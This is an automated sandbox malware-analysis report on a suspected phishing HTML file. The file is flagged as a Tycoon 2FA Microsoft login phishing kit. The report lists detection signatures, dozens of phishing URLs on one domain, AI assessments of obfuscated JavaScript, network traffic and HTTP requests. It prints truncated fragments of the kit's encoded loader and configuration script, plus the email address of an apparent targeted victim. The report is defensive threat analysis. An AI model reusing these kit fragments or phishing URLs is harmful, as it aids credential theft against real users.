Windows Analysis Report
suspect.html

Overview

General Information

Sample name:	suspect.html
Analysis ID:	1641093
MD5:	f5e6efad87e2133a94def99abe16d5eb
SHA1:	6ec0edf8eadf07db4689b88ffd5d02fa5acf3b55
SHA256:	0ccb860546987aa19ef992a8002cb46a13cd87c1e008419165bbce48d7e630cb
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

AI detected phishing page

Antivirus detection for URL or domain

HTML file submission requesting Cloudflare captcha challenge

Yara detected AntiDebug via timestamp check

Yara detected HtmlPhish10

Yara detected Invisible JS

Yara detected Obfuscation Via HangulCharacter

Yara detected Tycoon 2FA PaaS

AI detected suspicious Javascript

Detected javascript redirector / loader

Creates files inside the system directory

Deletes files inside the Windows folder

Detected non-DNS traffic on DNS port

HTML body contains low number of good links

HTML body contains password input but no form action

HTML page contains hidden javascript code

HTML title does not match URL

Invalid T&C link found

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

Signatures

AV Detection

Antivirus detection for URL or domain

Source: https://3pz.bughtswo.com/admi/	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/soIJXNjMdD7eIx6CmpFVmuPAf6WwWoCYwrRyag	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/56mQ3hNU0OeLFsBE0cdBYhj76720	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/xyYqDiOE9Wrs7igh30	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/opBd8RIsQEhweDF79MfJTmO32LcCxDbe4QgnBMPgPPghFozKdpmUpA5eLxsl9zJJ0KlUUZOyAEef196	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/favicon.ico	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/klSe5FeF4V4B9AsN4kzckt7xcRfhr56nJ41v2BUS7L5ZHUtaQLGpmLSV8ukuv220	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/GDSherpa-bold.woff	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/yfuOUwyTI9qASHIO1Yd1WuHEVWTfcFf2n32Nn6H6lWun5L5SxS2l	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/GDSherpa-vf2.woff2	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/zcjFjVbeWag4BIehEdWrtkCkgYwI2qGKbsfn5dGfq	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/mnGeMwtuiseg6FuvHXI23EgklvYhJt1DtbpXmd9tZGrz78150	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/GDSherpa-vf.woff2	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/GDSherpa-regular.woff2	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/wxB2I98tBROJelAq0Qq5WjZ6UMxcstFpC8Y9kgRgGII0H34126	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/opuxRiSxTmEM15vBJMb9leXlu5sefNsAugLT2OPWIt7nw45140	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/GDSherpa-bold.woff2	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/wxFhzp0CgTafW2l0GEvW2qmRzDYozFmnbQAb174rg3tC0nv90180	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/ghd1fCTJC2y4qjPZfLjhBbrPNhMv0H3ioowRZtB1smn00n8zWKAwWMYfyyL9TI13NS5A412210	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/56usdLGyORYNk44l9ghb0mDtUEm8nDuuFwg67110	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/opwzYslPhX1AtOROVu3V2KXjF2vYFIQTFKpREUQCrAUstQdhMWnYFFGrFe6cfvB6BRzktecd232	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/GDSherpa-regular.woff	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/kl3XiVz0aPutz6bSmjR9D2P593BDt6Z4DUWuOyzYQYdRIcPOAJBMuwV98WwDp5V256170	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/klCOczC1guexDGXVCE0TqxcNG891JB3LCJ5AUxbOyWvzDab230	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/wpE72XVhb4Z1pXQe52oRXxRmo	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/zc8QtV1AgOx9d4g80BylSMR67CLPWQsWgy	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/opCFdSgn1l9ejFMcZdMMdllPgt3wr0qvg5ghQ19r8NjVY4Vg9HKNBQfcd200	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/qrRKnn6n9eUoC5I00CX7vJefVlhQdgy6RPYvoDRYN1q67140	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/12cgfpYt7Gg84zxyfkj8918	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/klJEJj5AR8FEExIIOG1ZoX9K1rLijUqfl9xv18C2sUweSiWsxciyR4bNuR1awx216	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/klenjbRJbkmC9A5K6h8dlPsIojwX4ImnFqvwxZ7prt4wHIGzEyU78167	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/uheSegtXcJrGcg1LANWjxLwtiG1EYvEeZy6o1u9WZEqq1xsRwxhwODvkp	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/uvjJJeKRwvQvI18yo62v8qr2JrPPmCQo5SPbYPPQ12130	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/opyYQhzf6pW8TXFXX4aHCJLltYOpZ9gZxhstvZonqoZbKeJY8p18pl4GSjlC7bkgJBIycd240	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/ijjsoowXvipoSRdLsikOWGMMRfyP4mdeXkl14Vx3gpVt9nneix52sKmQK11HVfv3Pb12201	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/xyI3O4tCtbzsOtrs132Ycd30	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/uvrsNwJ0EBQ2dDGQwRbWOzn8AryE2uANKhJMqeuKmnccZhFbpNDM77XT7xoGTEiBeNLNv8SREeVj0l5gh260	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/ijoyUfMSqMcVe9WXGTZVlctVeCxOyPKKqrSkxb2xnBTPwVtirVuPyz230	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/56lW6APRQ2ESm07QQ6vYBzijnmTAv3b989110	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/efBjX2yOm7GgfZp7ySyVTDijLhRc5kO0DER2eibNKXblerN790150	Avira URL Cloud: Label: phishing

Phishing

AI detected phishing page

Source: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The URL '3pz.bughtswo.com' does not match the legitimate domain 'microsoft.com'., The domain 'bughtswo.com' is not associated with Microsoft and appears suspicious., The subdomain '3pz' does not provide any indication of legitimacy and is likely used to obfuscate the true nature of the site., The email domain 'wilsonsadvisory.com.au' does not match the brand 'Microsoft', which raises further suspicion. DOM: 1.3.pages.csv
Source: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWK	Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The legitimate domain for Microsoft is 'microsoft.com'., The URL '3pz.bughtswo.com' does not match the legitimate domain for Microsoft., The domain 'bughtswo.com' is not associated with Microsoft and appears suspicious., The use of a subdomain '3pz' and an unrelated main domain suggests a phishing attempt., The input fields 'Email, phone, or Skype' are commonly targeted in phishing attacks. DOM: 3.9.pages.csv

Yara detected HtmlPhish10

Source: Yara match	File source: 1.3.pages.csv, type: HTML
Source: Yara match	File source: 1.4.pages.csv, type: HTML
Source: Yara match	File source: 3.9.pages.csv, type: HTML

Yara detected Invisible JS

Source: Yara match	File source: 0.0.pages.csv, type: HTML
Source: Yara match	File source: 0.1.d.script.csv, type: HTML
Source: Yara match	File source: 0.1.pages.csv, type: HTML
Source: Yara match	File source: 2.23.d.script.csv, type: HTML
Source: Yara match	File source: 2.7.pages.csv, type: HTML
Source: Yara match	File source: 2.5.pages.csv, type: HTML
Source: Yara match	File source: 2.6.pages.csv, type: HTML

Yara detected Obfuscation Via HangulCharacter

Source: Yara match	File source: 0.0.pages.csv, type: HTML
Source: Yara match	File source: 0.1.d.script.csv, type: HTML
Source: Yara match	File source: 0.1.pages.csv, type: HTML
Source: Yara match	File source: 1.19..script.csv, type: HTML
Source: Yara match	File source: 2.23.d.script.csv, type: HTML
Source: Yara match	File source: 2.7.pages.csv, type: HTML
Source: Yara match	File source: 2.5.pages.csv, type: HTML
Source: Yara match	File source: 2.6.pages.csv, type: HTML
Source: Yara match	File source: 3.34..script.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_109, type: DROPPED

Yara detected Tycoon 2FA PaaS

Source: Yara match	File source: 1.16.d.script.csv, type: HTML
Source: Yara match	File source: 0.0.pages.csv, type: HTML
Source: Yara match	File source: 0.2.d.script.csv, type: HTML
Source: Yara match	File source: 0.9.d.script.csv, type: HTML
Source: Yara match	File source: 0.6..script.csv, type: HTML
Source: Yara match	File source: 0.1.pages.csv, type: HTML
Source: Yara match	File source: 1.11..script.csv, type: HTML
Source: Yara match	File source: 1.12..script.csv, type: HTML
Source: Yara match	File source: 1.3.pages.csv, type: HTML
Source: Yara match	File source: 1.4.pages.csv, type: HTML
Source: Yara match	File source: 2.22.d.script.csv, type: HTML
Source: Yara match	File source: 2.24..script.csv, type: HTML
Source: Yara match	File source: 2.7.pages.csv, type: HTML
Source: Yara match	File source: 2.5.pages.csv, type: HTML
Source: Yara match	File source: 2.6.pages.csv, type: HTML
Source: Yara match	File source: 3.33.d.script.csv, type: HTML
Source: Yara match	File source: 3.29..script.csv, type: HTML
Source: Yara match	File source: 2.27.d.script.csv, type: HTML
Source: Yara match	File source: 3.30..script.csv, type: HTML
Source: Yara match	File source: 3.9.pages.csv, type: HTML

AI detected suspicious Javascript

Source: 0.9.d.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates several high-risk behaviors, including disabling common keyboard shortcuts and context menus, as well as using a debugger trap to detect and redirect the user to an external domain. These behaviors are highly suspicious and indicate potential malicious intent, such as preventing the user from accessing the original content or redirecting them to a malicious site.
Source: 0.2.d.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates several high-risk behaviors, including disabling common debugging and developer tools, blocking keyboard shortcuts, and redirecting the user to an external website. The combination of these behaviors suggests a highly suspicious and potentially malicious script.
Source: 0.8..script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://3pz.bughtswo.com/admi/... This script demonstrates several high-risk behaviors, including dynamic code execution, potential data exfiltration, and suspicious redirection. The use of obfuscated code and the presence of a debugger-related function suggest malicious intent. Additionally, the script appears to be checking for the presence of web driver or headless browser environments, which is a common technique used by malware to detect and evade analysis. Overall, this script poses a significant security risk and should be treated with caution.
Source: 0.1.d.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates high-risk behaviors, including dynamic code execution using `eval()` and potential data exfiltration. The obfuscated code and use of proxy objects further increase the risk. Overall, this script exhibits a high level of suspicious activity and should be thoroughly investigated.
Source: 0.0..script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://3pz.bughtswo.com/admi/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob()` and `decodeURIComponent()` to decode and execute remote code is a clear indicator of malicious intent. Additionally, the script appears to be sending data to an untrusted domain (`zAz.bughtswo.com/admin`), which further increases the risk. Overall, this script exhibits a high level of suspicion and should be treated as a potential security threat.

Detected javascript redirector / loader

Source: suspect.html

HTTP Parser: Low number of body elements: 0

HTML body contains low number of good links

Source: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	HTTP Parser: Number of links: 0
Source: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWK	HTTP Parser: Number of links: 0

HTML body contains password input but no form action

Source: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWK	HTTP Parser: <input type="password" .../> found but no <form action="...

HTML page contains hidden javascript code

Source: suspect.html

HTTP Parser: Base64 decoded: brad.gale@wilsonsadvisory.com.au

HTML title does not match URL

Source: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	HTTP Parser: Title: Secure Account Access does not match URL
Source: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWK	HTTP Parser: Title: Enter Account Security Access does not match URL

Invalid T&C link found

Source: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	HTTP Parser: Invalid link: Terms of use
Source: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	HTTP Parser: Invalid link: Privacy & cookies
Source: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	HTTP Parser: Invalid link: Terms of use
Source: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	HTTP Parser: Invalid link: Privacy & cookies
Source: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWK	HTTP Parser: Invalid link: Terms of use
Source: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWK	HTTP Parser: Invalid link: Privacy & cookies

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Source: https://3pz.bughtswo.com/admi/	HTTP Parser: function gkmzlkxemo(){ysswiifynp = atob("pcfet0nuwvbfigh0bww+cjxodg1sigxhbmc9imvuij4kpghlywq+ciagica8bwv0ysbjagfyc2v0psjvveytoci+ciagica8bwv0ysbuyw1lpsj2awv3cg9ydcigy29udgvudd0id2lkdgg9zgv2awnllxdpzhrolcbpbml0awfslxnjywxlpteumci+ciagica8dgl0bgu+t2zmawnlidm2nsbeb2n1bwvudgf0aw9upc90axrszt4kicagidxzdhlszt4kicagicagicbib2r5ihskicagicagicagicagzm9udc1myw1pbhk6iefyawfslcbzyw5zlxnlcmlmowogicagicagicagicbsaw5llwhlawdoddogms42owogicagicagicagicbtyxjnaw46idiwchg7ciagicagicagfqogicagicagiggxlcbomib7ciagicagicagicagignvbg9yoiajmky1ndk2owogicagicagih0kicagicagicb1bcb7ciagicagicagicagigxpc3qtc3r5bgutdhlwztogc3f1yxjlowogicagicagih0kicagicagicbhihskicagicagicagicagy29sb3i6icmwmdc4rdq7ciagicagicagicagihrlehqtzgvjb3jhdglvbjogbm9uztskicagicagicb9ciagicagicagytpob3zlcib7ciagicagicagicagihrlehqtzgvjb3jhdglvbjogdw5kzxjsaw5lowogicagicagih0kicagidwvc3r5bgu+cjwvagvhzd4kpgjvzhk+ciagica8ade+r2v0dgluzybtdgfydgvkihdpdgggt2zmawnlidm2ntwvade+ciagica8cd5pzmzpy2ugmzy1iglzigegy2xvdwqtymfzzwqgc3vpdgugb2ygchjvzhvjdgl2axr5ihrvb2xzigrlc2lnbmvki...
Source: anonymous function	HTTP Parser: var otherweburl = "";var websitenames = ["godaddy", "okta"];var bes = ["apple.com","netflix.com"];var pes = ["https:\/\/t.me\/","https:\/\/t.com\/","t.me\/","https:\/\/t.me.com\/","t.me.com\/","t.me@","https:\/\/t.me@","https:\/\/t.me","https:\/\/t.com","t.me","https:\/\/t.me.com","t.me.com","t.me\/@","https:\/\/t.me\/@","https:\/\/t.me@\/","t.me@\/","https:\/\/www.telegram.me\/","https:\/\/www.telegram.me"];var capnum = 1;var appnum = 1;var pvn = 0;var view = "";var pagelinkval = "r4nft8";var emailcheck = "0";var webname = "rtrim(/web8/, '/')";var urlo = "/uhesegtxcjrgcg1lanwjxlwtig1eyveezy6o1u9wzeqq1xsrwxhwodvkp";var gdf = "/ghantxvapyniqs6cbwxo4kufdzl3i1xkcd116";var odf = "/gh4fj2hln9uw3vpfmyzdf0kbvfvrkdmnbab650";var twa = 0;var currentreq = null;var requestsent = false;var pagedata = "";var redirecturl = "";var useragent = navigator.useragent;var browsername;var userip;var usercountry;var errorcodeexecuted = false;if(useragent.match(/edg/i)){ browsern...

Source: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	HTTP Parser: <input type="password" .../> found
Source: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWK	HTTP Parser: <input type="password" .../> found

Source: suspect.html	HTTP Parser: No favicon
Source: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	HTTP Parser: No favicon
Source: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	HTTP Parser: No favicon
Source: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWK	HTTP Parser: No favicon

Source: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	HTTP Parser: No <meta name="author".. found
Source: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	HTTP Parser: No <meta name="author".. found
Source: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWK	HTTP Parser: No <meta name="author".. found

Source: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	HTTP Parser: No <meta name="copyright".. found
Source: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	HTTP Parser: No <meta name="copyright".. found
Source: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWK	HTTP Parser: No <meta name="copyright".. found

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.16:49696 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.16:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.16:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.16:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.68:443 -> 192.168.2.16:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.46:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.46:443 -> 192.168.2.16:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.148.69:443 -> 192.168.2.16:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.16:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.33.187.68:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.33.187.68:443 -> 192.168.2.16:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.16:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.33.187.96:443 -> 192.168.2.16:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.100:443 -> 192.168.2.16:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.70.233:443 -> 192.168.2.16:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.16:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.51.122:443 -> 192.168.2.16:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.46:443 -> 192.168.2.16:49794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49832 version: TLS 1.2

Detected non-DNS traffic on DNS port

Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 1.1.1.1:53

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.185.195
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.185.195
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.185.195
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.185.195
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.185.195
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /admi/ HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://3pz.bughtswo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://3pz.bughtswo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
